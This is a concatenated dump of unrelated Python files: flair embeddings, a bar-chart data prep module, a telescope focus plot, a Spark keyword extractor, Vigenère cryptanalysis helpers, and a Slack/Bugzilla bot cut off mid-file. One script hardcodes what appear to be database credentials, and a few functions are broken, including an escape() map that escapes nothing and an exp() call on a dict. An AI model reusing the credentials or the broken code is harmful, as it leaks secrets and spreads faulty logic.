open(self.model_file, mode=\"rb\").read()\n state[\"spm\"] = None\n return state\n\n def __setstate__(self, state):\n from bpemb.util import sentencepiece_load\n\n model_file = self.model_tpl.format(lang=state[\"lang\"], vs=state[\"vs\"])\n self.__dict__ = state\n\n # write out the binary sentence piece model into the expected directory\n self.cache_dir: Path = Path(flair.cache_root) / \"embeddings\"\n if \"spm_model_binary\" in self.__dict__:\n # if the model was saved as binary and it is not found on disk, write to appropriate path\n if not os.path.exists(self.cache_dir / state[\"lang\"]):\n os.makedirs(self.cache_dir / state[\"lang\"])\n self.model_file = self.cache_dir / model_file\n with open(self.model_file, \"wb\") as out:\n out.write(self.__dict__[\"spm_model_binary\"])\n else:\n # otherwise, use normal process and potentially trigger another download\n self.model_file = self._load_file(model_file)\n\n # once the modes if there, load it with sentence piece\n state[\"spm\"] = sentencepiece_load(self.model_file)\n","sub_path":"flair/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":11195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"265398130","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
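# Typical usage of the embedding classes defined in embeddings.py above
# (a sketch; 'en' selects the English byte-pair model, downloaded on first use):
from flair.data import Sentence
from flair.embeddings import StackedEmbeddings, CharacterEmbeddings, BytePairEmbeddings

stacked = StackedEmbeddings([CharacterEmbeddings(), BytePairEmbeddings('en')])
sentence = Sentence('hello world')
stacked.embed(sentence)
for token in sentence:
    print(token.get_embedding().shape)  # char-RNN dims + byte-pair dims, concatenated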
pd.read_csv)\nimport pickle\nimport json\n\nimport sqlite3\nimport datetime\n\nimport ast\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler\nimport datetime\nimport operator\n\nimport mf_algo_py_param\n\n\ndef calc_histogram(df,fld):\n hst = np.histogram(df[fld],bins='sturges')\n Y = hst[0]\n X = [\"_\"+str(c) for c in hst[1][1:]]\n df1 = pd.DataFrame()\n df1['X'] = X\n df1['Y'] = Y\n return df1\n\ndef calc_groupby(df,fld):\n df1 = df.groupby([fld])[[fld]].count()\n df1.columns = ['count']\n df1 = df1.reset_index()\n df1.columns = ['X','Y']\n return df1\n\n\ndef apply(df_input,step_param):\n #print (step_param)\n #Output df\n df_out = pd.DataFrame([], columns=['X','Y','field'])\n \n ##Graph table\n graph_table = step_param['config']['graph_table']\n \n\n ##Fields\n x_fields = step_param['config']['X']\n x_fields_param = mf_algo_py_param.set_param_value_list_str(x_fields)\n y_field_param = step_param['config']['Y']\n \n json_data = {}\n for fld in x_fields_param:\n \n dtyp = str(df_input[fld].dtype)\n \n ##Field content is string\n if (dtyp== 'object'):\n df1 = calc_groupby(df_input,fld)\n\n if (dtyp == 'int64' or dtyp == 'float64'):\n df1 = calc_histogram(df_input,fld)\n \n \n df1['field'] = fld\n json_df1 = df1.to_json(orient='records')\n json_data['data_'+str(fld)] = json.dumps(json_df1) \n \n\n \n df_out = pd.DataFrame(json_data,index=[0])\n \n \n json_out = {graph_table:df_out}\n \n return json_out\n\n \n","sub_path":"covalent/model-factory/backend/flask_api/algo_py/mf_algo_py_vizprep_barchart.py","file_name":"mf_algo_py_vizprep_barchart.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"258954280","text":"valores = input().split(' ')\n\nia, ib, ic = valores\na = int(ia)\nb = int(ib)\nc = int(ic)\n\nmaior_ab = (a + b + abs(a-b)) / 2\nmaior = int((maior_ab + c + abs(maior_ab - c)) / 2)\n\nprint('{} eh o maior'.format(maior))\n","sub_path":"uri/1013.py","file_name":"1013.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"637062464","text":"import matplotlib\nmatplotlib.use('Agg')\nimport numpy, pylab, os, sys\nfrom SRP.SRPDatabases.readPostgresTable import readPostgresTable\n\nquery=\"select * from REMPipeResult where ((Category = 'FCS'))\"\n\na = readPostgresTable('polaris','covino','covino','Gramigna',query)\n\n#print(a.info)\n\n\nFIGPATH = '/home/covino/REMZP/'\n\n\naw = a[(a['tint'] > -90) & (a['focus'] <= 23) & (a['focus'] >= 21) & (a['centrmjd'] > 58570.)]\nawg = aw[aw['filter']=='g']\nawr = aw[aw['filter']=='r']\nawi = aw[aw['filter']=='i']\nawz = aw[(aw['filter']=='g') | (aw['filter']=='r') | (aw['filter']=='i')]\nawj = aw[aw['filter']=='J']\n\n\np = pylab.figure()\npx = p.add_subplot(111)\n[i.set_linewidth(2) for i in px.spines.values()]\n\n\nttxt = pylab.title(\"REM Focus from 2019 Mar 28\")\nxtxt = pylab.xlabel(\"T$_{int}$ $^0$C\")\nytxt = pylab.ylabel(\"Focus (mm)\")\n\n\"\"\"\ntpos = numpy.arange(awg['tint'].min(),awg['tint'].max(),1.)\nfw = []\ntw = []\nfor t in tpos:\n awgt = awg[(awg['tint'] >= (t-0.5)) & (awg['tint'] < (t+0.5))]\n if len(awgt['fwhm']) > 0:\n fw.append(awgt['focus'][awgt['fwhm'].argmin()])\n tw.append(t)\npx.plot(tw,fw,'-o',label='g')\n\n\ntpos = numpy.arange(awr['tint'].min(),awr['tint'].max(),1.)\nfw = []\ntw = []\nfor t in tpos:\n awrt = awr[(awr['tint'] >= (t-0.5)) & (awr['tint'] < (t+0.5))]\n if len(awrt['fwhm']) > 0:\n 
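# 1013.py above relies on the identity max(a, b) == (a + b + abs(a - b)) / 2,
# applied twice to pick the largest of three values (equivalent to max(a, b, c));
# e.g. a=7, b=3 gives (7 + 3 + 4) / 2 == 7.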
fw.append(awrt['focus'][awrt['fwhm'].argmin()])\n tw.append(t)\npx.plot(tw,fw,'-o',label='r')\n\n\ntpos = numpy.arange(awi['tint'].min(),awi['tint'].max(),1.)\nfw = []\ntw = []\nfor t in tpos:\n awit = awi[(awi['tint'] >= (t-0.5)) & (awi['tint'] < (t+0.5))]\n if len(awit['fwhm']) > 0:\n fw.append(awit['focus'][awit['fwhm'].argmin()])\n tw.append(t)\npx.plot(tw,fw,'-o',label='i')\n\"\"\"\n\nif len(awz) > 0:\n tpos = numpy.arange(awz['tint'].min(),awz['tint'].max(),1.)\n fw = []\n tw = []\n for t in tpos:\n awzt = awz[(awz['tint'] >= (t-0.5)) & (awz['tint'] < (t+0.5))]\n if len(awzt['fwhm']) > 0:\n fw.append(awzt['focus'][awzt['fwhm'].argmin()])\n tw.append(t)\n px.plot(tw,fw,'o',label='Opt', color='blue')\n\n ttw = numpy.array(tw)\n ffw = numpy.array(fw)\n z = numpy.polyfit(ttw[ffw < 23], ffw[ffw < 23], 1)\n f = numpy.poly1d(z)\n d = numpy.linspace(ttw[ffw < 23][0],ttw[ffw < 23][-1],100)\n px.plot(d,f(d),'-',color='blue')\n px.text(5,21.60,z,color='blue')\n\nif len(awj) > 0:\n tpos = numpy.arange(awj['tint'].min(),awj['tint'].max(),1.)\n fw = []\n tw = []\n for t in tpos:\n awjt = awj[(awj['tint'] >= (t-0.5)) & (awj['tint'] < (t+0.5))]\n if len(awjt['fwhm']) > 0:\n fw.append(awjt['focus'][awjt['fwhm'].argmin()])\n tw.append(t)\n px.plot(tw,fw,'o',label='J',color='red')\n\n ttw = numpy.array(tw)\n ffw = numpy.array(fw)\n z = numpy.polyfit(ttw[ffw < 23], ffw[ffw < 23], 1)\n f = numpy.poly1d(z)\n d = numpy.linspace(ttw[ffw < 23][0],ttw[ffw < 23][-1],100)\n px.plot(d,f(d),'-',color='red')\n px.text(5,21.70,z,color='red')\n\n\nz = [-9.5e-3, 21.45000]\nf = numpy.poly1d(z)\nd = numpy.linspace(ttw[ffw < 23][0],ttw[ffw < 23][-1],100)\npx.plot(d,f(d),'-',color='green',label='REM')\npx.text(5,21.80,z,color='green')\n\npylab.ylim((21.0,22.0))\n#pylab.xlim((0,150))\npylab.legend(loc='best',numpoints=1)\n\n\n\npylab.show()\npylab.savefig(FIGPATH+'remfocus.png')\n\n\n\n","sub_path":"python3/TelPipes/leggi_REM_Focus.py","file_name":"leggi_REM_Focus.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"97404315","text":"from pyspark import SparkContext\nfrom pyspark import SparkConf\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col, lit, concat\nfrom pymongo import MongoClient\nimport pandas as pd\nimport re\nimport numpy as np\nimport RAKE\n\nclient = MongoClient(\"mongodb://152.46.19.205:27017\")\ndb = client['meetup']\ncollection = db['cityEvent']\n\ndef createDict(values):\n\ttemp_dict = {}\n\tfor value in values:\n\t\tif value in temp_dict:\n\t\t\ttemp_dict[value] = temp_dict[value] + 1\n\t\telse:\n\t\t\ttemp_dict[value] = 1\n\treturn temp_dict\n\ndef flatten(values):\n\ttemp_list = []\n\tfor value in values:\n\t\tfor word in value:\n\t\t\ttemp_list.append(word)\n\treturn temp_list\n\ndef extractWords(event):\n\ttemp_list = []\n\tcity = event[0]\n\tfor keyword in event[1]:\n\t\twords = (re.split(r'\\s{1,}', keyword[0]))\n\t\tfor word in words:\n\t\t\ttemp_list.append(word)\n\treturn (city,temp_list)\n\ndef createSortedList(event):\n\treturn sorted(event, key=event.get, reverse=True)\n\n#sc = SparkContext('local','example')\n\nconf = SparkConf()\nconf.setMaster('spark://152.46.16.246:7077')\nconf.setAppName('spark-basic')\nsc = SparkContext(conf=conf)\n\nspark = SparkSession.builder.appName(\"Keyword Extraction\").getOrCreate()\nevent_df = 
spark.read.format('com.databricks.spark.csv').options(header='true').load('hdfs://152.46.16.246/user/rahuja/In/test.csv')\nsql_sc = SQLContext(sc)\n\n# raw_df = pd.read_csv('/home/rohit910/CSC591-DIC/output_nocomma1.csv')\n# raw_df = pd.read_csv('hdfs://152.46.16.246/user/rahuja/In/output_nocomma1.csv')\n\n#raw_df = pd.read_csv('/home/rahuja/output_final.csv')\n\n#raw_df_1 = raw_df.replace(np.nan,' ', regex=True)\n#raw_df_2 = raw_df_1[['event_id','event_name','description','city','group_name']]\n#event_df = sql_sc.createDataFrame(raw_df_2)\n\nevent_df = event_df.select(concat(col(\"event_name\"), lit(\" \"), col(\"description\"), lit(\" \"), col(\"group_name\")).alias(\"data\"), col(\"city\"))\n\n#Rake = RAKE.Rake(\"/home/rohit910/CSC591-DIC/python-rake/stoplists/SmartStoplist.txt\")\n\nRake = RAKE.Rake(\"/home/rahuja/RakeTest/SmartStoplist.txt\")\n\nevent_rdd = event_df.rdd.map(lambda x: (x.city, Rake.run(x.data)[0:5]))\nevent_rdd_1 = event_rdd.map(extractWords)\nevent_rdd_2 = event_rdd_1.groupByKey().mapValues(list).mapValues(flatten)\nevent_rdd_3 = event_rdd_2.mapValues(createDict)\nevent_rdd_4 = event_rdd_3.mapValues(createSortedList)\n\nevent_data = event_rdd_4.collect()\n\nfor event in event_data:\n\tevent_object = {\"city\" : event[0], \"events\": event[1]}\n\tcollection.insert_one(event_object).inserted_id\n","sub_path":"preprocess_parallelize.py","file_name":"preprocess_parallelize.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"305711921","text":"from math import exp\n\n\ndef number_code_from_letter_code(letter_code, alphabet):\n return [alphabet.letters_to_position[letter] for letter in letter_code]\n\n\ndef is_word_end(text, index):\n try:\n return index in text.ends_of_words\n except AttributeError:\n\n return False\n\n\ndef get_n_gram_generator_at_i_left(text, n, i):\n gram = \"\"\n k = i\n t = k\n while i - t < n and k >= 0:\n gram = text[k] + gram\n k -= 1\n t -= 1\n if is_word_end(text, k):\n stripped = text.stripped_part[text.ends_of_words[k]]\n j = len(stripped) - 1\n while i - t < n and j >= 0:\n gram = stripped[j] + gram\n t -= 1\n j -= 1\n if gram:\n return gram[:-1]\n return gram\n\n\ndef get_n_gram_generator_at_i_right(text, n, i):\n gram = \"\"\n k = i\n t = i\n while t - i < n and k < len(text):\n gram += text[k]\n k += 1\n t += 1\n if is_word_end(text, k - 1):\n stripped = text.stripped_part[text.ends_of_words[k-1]]\n j = 0\n while t - i < n and j < len(stripped):\n gram += stripped[j]\n t += 1\n j += 1\n return gram\n\n\ndef get_n_gram_generator_at_i(text, n, i):\n if i < 0 or i >= len(text):\n return None\n gram = get_n_gram_generator_at_i_left(text, n, i) + get_n_gram_generator_at_i_right(text, n, i)\n if len(gram) < n:\n return None\n return gram\n\n\ndef get_n_grams_with_i(text, n, i):\n generator = get_n_gram_generator_at_i(text, n, i)\n if generator:\n return [generator[i:i+n] for i in range(len(generator) - n + 1)]\n return []\n\n\ndef calculate_n_gram_frequencies(text, n):\n frequencies_dict = {}\n current_gram = \"\"\n if is_word_end(text, -1):\n stripped_beginning = text.stripped_part[text.ends_of_words[-1]]\n for i in range(len(stripped_beginning)):\n current_gram += stripped_beginning[i]\n if len(current_gram) > n:\n current_gram = current_gram[1:]\n if len(current_gram) == n:\n try:\n frequencies_dict[current_gram] += 1\n except KeyError:\n frequencies_dict[current_gram] = 1\n for i in range(len(text)):\n current_gram += text[i]\n if 
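# calculate_n_gram_frequencies slides a length-n window over the text,
# splicing back in the characters stripped at word ends, and counts each gram;
# e.g. for a plain text 'abab' with no stripped parts and n == 2 it returns
# {'ab': 2, 'ba': 1}.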
len(current_gram) > n:\n current_gram = current_gram[1:]\n if len(current_gram) == n:\n try:\n frequencies_dict[current_gram] += 1\n except KeyError:\n frequencies_dict[current_gram] = 1\n if is_word_end(text, i):\n stripped = text.stripped_part[text.ends_of_words[i]]\n for j in range(len(stripped)):\n current_gram += stripped[j]\n if len(current_gram) > n:\n current_gram = current_gram[1:]\n if len(current_gram) == n:\n try:\n frequencies_dict[current_gram] += 1\n except KeyError:\n frequencies_dict[current_gram] = 1\n return frequencies_dict\n\n\ndef calculate_n_gram_log_weight(frequencies, log_distribution):\n result = 0\n for i in frequencies:\n try:\n result += log_distribution[i]*frequencies[i]\n except KeyError:\n pass\n return result\n\n\ndef get_frequencies_change(old_frequencies, new_frequencies):\n frequencies_change = {}\n for i in old_frequencies:\n if old_frequencies[i] != new_frequencies[i]:\n frequencies_change[i] = new_frequencies[i] - old_frequencies[i]\n return frequencies_change\n\n\ndef calculate_log_weight_change(frequencies_change, log_distribution):\n result = 0\n for i in frequencies_change:\n try:\n result += log_distribution[i]*frequencies_change[i]\n except KeyError:\n pass\n return result\n\n\ndef update_frequency(frequency, frequency_change):\n for i in frequency_change:\n try:\n frequency[i] += frequency_change[i]\n except KeyError:\n frequency[i] = frequency_change[i]\n\n\ndef find_change_in_key(old_key, new_key):\n for i in range(len(old_key)):\n if old_key[i] != new_key[i]:\n return i\n\n\ndef add_gram_to_frequency_change(gram, frequencies_change):\n if not gram:\n return\n try:\n frequencies_change[gram] += 1\n except KeyError:\n frequencies_change[gram] = 1\n\n\ndef subtract_gram_from_frequency_change(gram, frequencies_change):\n if not gram:\n return\n try:\n frequencies_change[gram] -= 1\n except KeyError:\n frequencies_change[gram] = -1\n\n\ndef get_bigrams_in_coords(text, i):\n bigrams = []\n if i == 0 and is_word_end(text, -1):\n beginning = text.stripped_part[text.ends_of_words[-1]]\n bigrams.append(beginning[-1] + text[i])\n if not is_word_end(text, i) and i + 1 < len(text):\n bigrams.append(text[i]+text[i+1])\n return bigrams\n stripped_index = text.ends_of_words[i]\n if text.stripped_part[stripped_index]:\n bigrams.append(text[i] + text.stripped_part[stripped_index][0])\n if i + 1 < len(text):\n bigrams.append(text.stripped_part[stripped_index][-1] + text[i+1])\n return bigrams\n\n\ndef expected_value(log_frequencies, text_length):\n normalizer = 0\n expected = 0\n for i in log_frequencies:\n normalizer += exp(log_frequencies[i])\n for i in log_frequencies:\n expected += log_frequencies[i]*exp(log_frequencies)\n return (expected/normalizer)*text_length\n\n\ndef consistency_vigenere(guessed_key, real_key, alphabet):\n guessed_copy = guessed_key[:]\n real_copy = real_key[:]\n while len(guessed_copy) != len(real_copy):\n if len(guessed_copy) > len(real_copy):\n real_copy += real_key\n else:\n guessed_copy += guessed_key\n accuracy = 0\n for i in range(len(guessed_copy)):\n if not (guessed_copy[i] - real_copy[i]) % alphabet.length:\n accuracy += 1\n\n return accuracy/len(guessed_copy)\n\n\ndef consistency_vigenere_extended(guessed_key, real_key, alphabet):\n guessed_copy = guessed_key[:]\n real_copy = real_key[:]\n while len(guessed_copy) != len(real_copy):\n if len(guessed_copy) > len(real_copy):\n real_copy += real_key\n else:\n guessed_copy += guessed_key\n accuracy = 0\n for i in range(len(guessed_copy)):\n if not (guessed_copy[i][0] - 
real_copy[i][0]) % alphabet.length and \\\n not (guessed_copy[i][1] - real_copy[i][1]) % alphabet.length:\n accuracy += 1\n return accuracy/len(guessed_copy)\n\n\ndef consistency(guessed_key, real_key, alphabet):\n try:\n return consistency_vigenere(guessed_key, real_key, alphabet)\n except TypeError:\n return consistency_vigenere_extended(guessed_key, real_key, alphabet)\n\n\ndef get_piece_on_i_coordinate(text, i, key_length):\n piece = []\n for coord in range(i, len(text), key_length):\n piece.append(text[coord])\n return piece\n","sub_path":"decryption_problem/common/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"472025044","text":"#!/usr/bin/python3\n#\n# Apache 2.0 license\n\nimport argparse\nimport bugzilla\nfrom collections import OrderedDict\nfrom dotted_dict import DottedDict\nfrom functools import cached_property, reduce, wraps\nimport itertools\nimport os\nfrom slack_sdk import WebClient\nfrom slack_sdk.socket_mode import SocketModeClient\nfrom slack_sdk.socket_mode.response import SocketModeResponse\nimport sqlite3\nimport time\nimport threading\nimport traceback\nimport yaml\n\nISSUE_LINK = 'https://github.com/coreos/rhcosbot/issues'\nHELP = f'''\nI understand these commands:\n%commands%\n\nBug statuses:\n:bugzilla: *NEW, ASSIGNED*\n:branch: POST\n:test_tube: POST & in RHCOS build & awaiting verification\n:large_green_circle: _POST & in RHCOS build & verified_\n:checkyes: ~MODIFIED, ON_QA, VERIFIED, CLOSED~\n:thinking_face: ¿Other?\n\nReport problems <{ISSUE_LINK}|here>.\n'''\n\n\nbootimage_creation_lock = threading.Lock()\n\n\ndef escape(message):\n '''Escape a string for inclusion in a Slack message.'''\n # https://api.slack.com/reference/surfaces/formatting#escaping\n map = {\n '&': '&',\n '<': '<',\n '>': '>',\n }\n return reduce(lambda s, p: s.replace(p[0], p[1]), map.items(), message)\n\n\nclass Database:\n def __init__(self, config):\n self._db = sqlite3.connect(config.database)\n with self:\n ver = self._db.execute('pragma user_version').fetchone()[0]\n if ver < 1:\n self._db.execute('create table events '\n '(added integer not null, '\n 'channel text not null, '\n 'timestamp text not null)')\n self._db.execute('create unique index events_unique '\n 'on events (channel, timestamp)')\n self._db.execute('pragma user_version = 1')\n\n def __enter__(self):\n '''Start a database transaction.'''\n self._db.__enter__()\n return self\n\n def __exit__(self, exc_type, exc_value, tb):\n '''Commit a database transaction.'''\n if exc_type in (HandledError, Fail):\n # propagate exception but commit anyway\n self._db.__exit__(None, None, None)\n return False\n return self._db.__exit__(exc_type, exc_value, tb)\n\n def add_event(self, channel, ts):\n '''Return False if the event is already present.'''\n try:\n self._db.execute('insert into events (added, channel, timestamp) '\n 'values (?, ?, ?)', (int(time.time()), channel, ts))\n return True\n except sqlite3.IntegrityError:\n return False\n\n def prune_events(self, max_age=3600):\n self._db.execute('delete from events where added < ?',\n (int(time.time() - max_age),))\n\n\nclass HandledError(Exception):\n '''An exception which should just be swallowed.'''\n pass\n\n\nclass Fail(Exception):\n '''An exception with a message that should be displayed to the user.'''\n pass\n\n\nclass Release:\n '''One release specification from the config.'''\n\n def __init__(self, config_struct):\n self.label = 
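# consistency_vigenere above pads both keys to a common multiple of their
# lengths and counts positionwise matches modulo the alphabet size; e.g. a
# guessed key [1, 2] against a real key [1, 2, 1, 2] compares four positions
# and scores 1.0.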
config_struct.label\n self.version = config_struct.bz_version\n self.target = config_struct.bz_target\n self.aliases = config_struct.get('bz_target_aliases', [])\n\n def __repr__(self):\n return f'<{self.__class__.__name__} {self.label}>'\n\n @property\n def targets(self):\n return [self.target] + self.aliases\n\n\nclass Releases(OrderedDict):\n '''Release specifications from the config, keyed by the label.'''\n\n @classmethod\n def from_config(cls, config):\n ret = cls()\n targets = set()\n for struct in config.releases:\n rel = Release(struct)\n ret[rel.label] = rel\n # Validate that there are no duplicate targets\n for target in [rel.target] + rel.aliases:\n if target in targets:\n raise ValueError(f'Duplicate target version \"{target}\"')\n targets.add(target)\n return ret\n\n @property\n def current(self):\n '''Return the current release.'''\n return next(iter(self.values()))\n\n @property\n def previous(self):\n '''Return previous releases.'''\n ret = self.copy()\n ret.popitem(last=False)\n return ret\n\n def at_least(self, label):\n '''Return all releases >= the specified label, or all releases if\n no label is specified.'''\n if label is None:\n return self.copy()\n ret = self.__class__()\n for rel in self.values():\n ret[rel.label] = rel\n if rel.label == label:\n return ret\n raise KeyError(label)\n\n @cached_property\n def by_target(self):\n '''Return a map from target to Release.'''\n ret = {}\n for rel in self.values():\n ret[rel.target] = rel\n for alias in rel.aliases:\n ret[alias] = rel\n return ret\n\n\nclass Bugzilla:\n '''Wrapper class for accessing Bugzilla.'''\n\n # Some standard BZ fields that we usually want\n DEFAULT_FIELDS = [\n 'cf_devel_whiteboard',\n 'cf_verified',\n 'component',\n 'keywords',\n 'product',\n 'summary',\n 'status',\n 'target_release',\n ]\n\n BOOTIMAGE_WHITEBOARD = 'bootimage'\n # Can't use hyphens or underscores, since those count as a word boundary\n BOOTIMAGE_BUG_WHITEBOARD = 'bootimageNeeded'\n BOOTIMAGE_BUG_BUILT_WHITEBOARD = 'imageBuilt'\n\n BOOTIMAGE_BUG_VERIFIED = 'Tested'\n\n def __init__(self, config):\n self.api = bugzilla.Bugzilla(config.bugzilla,\n api_key=config.bugzilla_key, force_rest=True)\n self._config = config\n\n def getbug(self, desc, fields=[]):\n '''Query Bugzilla for a bug. desc can be a bug number, or a string\n with a bug number, or a BZ URL with optional anchor.'''\n\n # Convert desc to integer\n if isinstance(desc, str):\n # Slack puts URLs inside <>.\n try:\n bz = int(desc.replace(self._config.bugzilla_bug_url, '', 1). \\\n split('#')[0]. \\\n strip(' <>'))\n except ValueError:\n raise Fail(\"Invalid bug number.\")\n else:\n bz = desc\n\n # Query Bugzilla\n fields = fields + self.DEFAULT_FIELDS\n try:\n bug = self.api.getbug(bz, include_fields=fields)\n except IndexError:\n raise Fail(f\"Couldn't find bug {bz}.\")\n\n # Basic validation that it's safe to operate on this bug\n if bug.product != self._config.bugzilla_product:\n raise Fail(f'Bug {bz} has unexpected product \"{escape(bug.product)}\".')\n if bug.component != self._config.bugzilla_component:\n raise Fail(f'Bug {bz} has unexpected component \"{escape(bug.component)}\".')\n\n return bug\n\n def query(self, fields=[], whiteboard=None, extra={},\n default_component=True, **kwargs):\n '''Search Bugzilla. kwargs are passed to build_query(). Arguments\n not supported by build_query can be passed in extra and will be\n applied to the query dict afterward. 
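# Releases above is ordered newest-first: .current is the first entry and
# .at_least(label) returns everything from the newest release down to that
# label inclusive (a label argument of None yields all releases).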
Limit to configured product/\n component unless default_component is False.'''\n\n if default_component:\n kwargs.update({\n 'product': self._config.bugzilla_product,\n 'component': self._config.bugzilla_component,\n })\n query = self.api.build_query(\n include_fields=fields + self.DEFAULT_FIELDS,\n **kwargs\n )\n query.update(extra)\n if whiteboard is not None:\n query.update({\n 'f1': 'cf_devel_whiteboard',\n 'o1': 'allwords',\n 'v1': whiteboard,\n })\n return sorted(self.api.query(query), key=lambda b: b.id)\n\n def get_backports(self, bug, fields=[], min_ver=None):\n '''Follow the backport bug chain from the specified Bug, until we\n reach min_ver or run out of bugs or configured releases. Return a\n list of Bugs from newest to oldest release, including the specified\n Bugzilla fields. Fail if the specified BZ doesn't match the\n configured current release.'''\n\n # Check bug invariants\n bug_target = bug.target_release[0]\n if bug_target not in self._config.releases.current.targets:\n raise Fail(f'Bug {bug.id} targets release \"{escape(bug_target)}\" but latest release is {self._config.releases.current.target}.')\n\n # Walk each backport version\n cur_bug = bug\n ret = []\n for rel in self._config.releases.at_least(min_ver).previous.values():\n # Check for an existing clone with this target release or\n # one of its aliases\n candidates = self.query(\n target_release=rel.targets,\n fields=fields,\n extra={\n 'cf_clone_of': cur_bug.id,\n },\n )\n if len(candidates) > 1:\n bzlist = ', '.join(str(b.id) for b in candidates)\n raise Fail(f\"Found multiple clones of bug {cur_bug.id} with target release {rel.label}: {bzlist}\")\n if len(candidates) == 0:\n break\n cur_bug = candidates[0]\n ret.append(cur_bug)\n return ret\n\n def get_bootimages(self, status='ASSIGNED', fields=[]):\n '''Get a map from release label to bootimage bump bug with the\n specified status. Fail if any release has multiple bootimage bumps\n with that status. Include the specified bug fields.'''\n\n bugs = self.query(fields=fields, status=status,\n whiteboard=self.BOOTIMAGE_WHITEBOARD)\n ret = {}\n for bug in bugs:\n try:\n rel = self._config.releases.by_target[bug.target_release[0]]\n except KeyError:\n # unknown target release; ignore\n continue\n if rel.label in ret:\n raise Fail(f'Found multiple bootimage bumps for release {rel.label} with status {status}: {ret[rel.label].id}, {bug.id}.')\n ret[rel.label] = bug\n return ret\n\n def get_bootimage_bugs(self, bootimage, release, fields=[], built=False,\n **kwargs):\n '''Find bugs attached to the specified bootimage bump and release,\n which must match. We normally refuse to create bootimage bugs\n outside our component, but if they've been created manually, detect\n them anyway so bugs don't get missed. 
If built is True, only find\n bugs that are marked built.'''\n whiteboard = self.BOOTIMAGE_BUG_WHITEBOARD\n if built:\n whiteboard += ' ' + self.BOOTIMAGE_BUG_BUILT_WHITEBOARD\n return self.query(\n dependson=[bootimage.id],\n target_release=release.targets,\n fields=fields,\n whiteboard=whiteboard,\n default_component=False,\n **kwargs\n )\n\n @staticmethod\n def whiteboard(bug):\n '''Return the words in the dev whiteboard for the specified Bug.'''\n return bug.cf_devel_whiteboard.split()\n\n def create_bootimage(self, release, fields=[]):\n '''Create or look up a bootimage for the specified release and\n return a bug including the specified fields, and a boolean\n indicating whether the bootimage was newly created.'''\n # Lock to make sure multiple Slack commands don't race to create the\n # bug\n with bootimage_creation_lock:\n created = False\n # Double-check for the BZ under the creation lock\n bugs = self.query(\n status='ASSIGNED',\n whiteboard=self.BOOTIMAGE_WHITEBOARD,\n target_release=release.targets\n )\n if len(bugs) > 1:\n raise Fail(f'Found multiple existing bootimage bumps for release {release.label} with status ASSIGNED: {\", \".join(str(b.id) for b in bugs)}')\n elif bugs:\n # Reuse existing bug\n bz = bugs[0].id\n else:\n # Create new bug\n desc = f'Tracker bug for bootimage bump in {release.label}. This bug should block bugs which need a bootimage bump to fix.'\n # Find the most recent bump for this release, if any.\n # Use the one with the highest ID.\n previous = self.query(\n status=['POST', 'MODIFIED', 'ON_QA', 'VERIFIED', 'RELEASE_PENDING', 'CLOSED'],\n whiteboard=self.BOOTIMAGE_WHITEBOARD,\n target_release=release.targets,\n )\n if previous:\n previous_id = list(b.id for b in previous)[-1]\n desc += f'\\n\\nThe previous bump was bug {previous_id}.'\n info = self.api.build_createbug(\n product=self._config.bugzilla_product,\n component=self._config.bugzilla_component,\n version=release.version,\n summary=f'[{release.label}] Bootimage bump tracker',\n description=desc,\n cc=self._config.get('bugzilla_cc', []),\n assigned_to=self._config.bugzilla_assignee,\n severity=self._config.get('bugzilla_severity', 'medium'),\n status='ASSIGNED',\n target_release=release.target,\n )\n info['cf_devel_whiteboard'] = self.BOOTIMAGE_WHITEBOARD\n if previous:\n info['cf_clone_of'] = previous_id\n bz = self.api.createbug(info).id\n created = True\n return self.getbug(bz, fields=fields), created\n\n def ensure_bootimage_bug_allowed(self, bug):\n '''Raise Fail if the bug must not be added to a bootimage bump.'''\n deny_keywords = self._config.get('bootimage_deny_keywords', [])\n kw = set(deny_keywords) & set(bug.keywords)\n if kw:\n raise Fail(f'By policy, this bug cannot be added to a bootimage bump because of keywords: *{escape(\", \".join(kw))}*')\n\n def update_bootimage_bug_status(self, bootimage_status, bootimage_bug_status,\n new_bootimage_bug_status, comment, built=False):\n '''Find all bootimage bugs in status bootimage_bug_status (list) and\n associated with a bootimage in status bootimage_status (singular),\n then move them to new_bootimage_bug_status with the specified comment,\n which supports the format fields \"bootimage\" (bootimage BZ ID) and\n \"status\" (bootimage BZ status). 
If built is True, modify only\n bootimage bugs which have been marked built.'''\n bootimages = self.get_bootimages(status=bootimage_status)\n for label, rel in self._config.releases.items():\n try:\n bootimage = bootimages[label]\n except KeyError:\n continue\n bugs = self.get_bootimage_bugs(bootimage, rel,\n status=bootimage_bug_status, built=built)\n if not bugs:\n continue\n update = self.api.build_update(\n status=new_bootimage_bug_status,\n comment=comment.format(\n bootimage=bootimage.id,\n status=bootimage.status\n ),\n )\n self.api.update_bugs([b.id for b in bugs], update)\n\n\ndef report_errors(f):\n '''Decorator that sends exceptions to an administrator via Slack DM\n and then swallows them. The first argument of the function must be\n the config.'''\n import json, requests, socket, urllib.error\n @wraps(f)\n def wrapper(config, *args, **kwargs):\n def send(message):\n try:\n client = WebClient(token=config.slack_token)\n channel = client.conversations_open(users=[config.error_notification])['channel']['id']\n client.chat_postMessage(channel=channel, text=message)\n except Exception:\n traceback.print_exc()\n try:\n return f(config, *args, **kwargs)\n except Fail as e:\n # Nothing else caught this; just report the error string.\n send(str(e))\n except HandledError:\n pass\n except (json.JSONDecodeError, requests.ConnectionError, requests.HTTPError, requests.ReadTimeout) as e:\n # Exception type leaked from the bugzilla API. Assume transient\n # network problem; don't send message.\n print(e)\n except (socket.timeout, urllib.error.URLError) as e:\n # Exception type leaked from the 